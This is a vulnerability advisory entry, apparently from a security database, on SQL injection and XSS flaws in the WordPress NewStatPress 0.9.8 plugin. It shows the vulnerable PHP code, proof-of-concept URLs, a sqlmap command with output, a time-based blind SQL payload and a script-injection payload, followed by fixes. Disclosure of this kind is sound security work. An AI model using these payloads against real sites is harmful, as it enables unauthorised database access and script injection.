WordPress NewStatPress Plugin 0.9.8 xss+sql注入

基本字段

漏洞编号:
SSV-89277
披露/发现时间:
2015-08-31
提交时间:
2015-08-31
漏洞等级:
漏洞类别:
SQL 注入
影响组件:
WordPress
(=0.9.8)
漏洞作者:
未知
提交者:
侦探911
CVE-ID:
CVE-2015-4062
CNNVD-ID:
CNNVD-201505-496
CNVD-ID:
CNVD-2015-03439
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 Knownsec 共获得  0.85KB

主题地址:https://wordpress.org/plugins/newstatpress/

影响版本:0.9.8

Active installs: 20,000+

CVE: CVE-2015-4062, CVE-2015-4063

1)sql注入 [CWE-89] (CVE-2015-4062)

* CODE:

includes/nsp_search.php:94

for($i=1;$i<=3;$i++) {

    if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) {

        $where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'";

    }

}


POC:

http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search


SQLMAP:

./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1
[............]
GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 

sqlmap identified the following injection points with a total of 89 HTTP(s) requests:

Parameter: where1 (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&amp;limitquery=1&amp;searchsubmit=Buscar&amp;page=nsp_search

[12:25:59] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 7.0 (wheezy) web application technology: Apache 2.2.22, PHP 5.4.39 back-end DBMS: MySQL 5.0.12


2)xss[CWE-79] (CVE-2015-4063)

includes/nsp_search.php:128

for($i=1;$i<=3;$i++) {

    if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; }

}

POC:

http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search

RickGray 弹指江山 yql丶 Howsk Disorder Medici.Yan @mb1Dex 等 14  兑换了

PoC (pocsuite 插件) (pocsuite 插件)

贡献者 yql丶 共获得   9.2KB
登陆后兑换查看

Disorder @mb1Dex lightning1141 共 5 兑换

参考链接

解决方案

临时解决方案

1. 停用该插件
2. 自行修改代码, 对 where1 参数进行 stripslashes 和 html实体编码

官方解决方案

更新 WordPress 插件 NewStatPress

防护方案

暂无防护方案

人气 1938
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负